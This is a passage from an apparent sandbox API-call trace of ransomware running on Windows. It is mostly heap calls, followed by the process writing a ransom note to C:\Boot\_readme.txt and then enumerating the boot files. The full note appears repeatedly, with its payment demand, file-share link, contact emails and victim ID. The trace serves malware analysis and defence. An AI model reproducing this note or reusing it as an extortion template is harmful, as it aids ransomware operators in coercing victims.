hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.575] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.576] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.578] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.578] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.578] PathFindFileNameW (pszPath="") returned="" [0173.578] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.579] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.579] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.579] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.579] PathAppendW (in: pszPath="C:\\Boot\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\_readme.txt") returned 1 [0173.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.579] PathFileExistsW (pszPath="C:\\Boot\\_readme.txt") returned 0 [0173.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.580] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.580] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.580] CreateFileW (lpFileName="C:\\Boot\\_readme.txt" (normalized: "c:\\boot\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.581] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.581] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.582] CloseHandle (hObject=0x690) returned 1 [0173.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.582] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.582] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e3f49c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3f49c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.582] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e3f49c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3f49c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0173.583] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.583] RtlAllocateHeap (HeapHandle=0x2c0000, 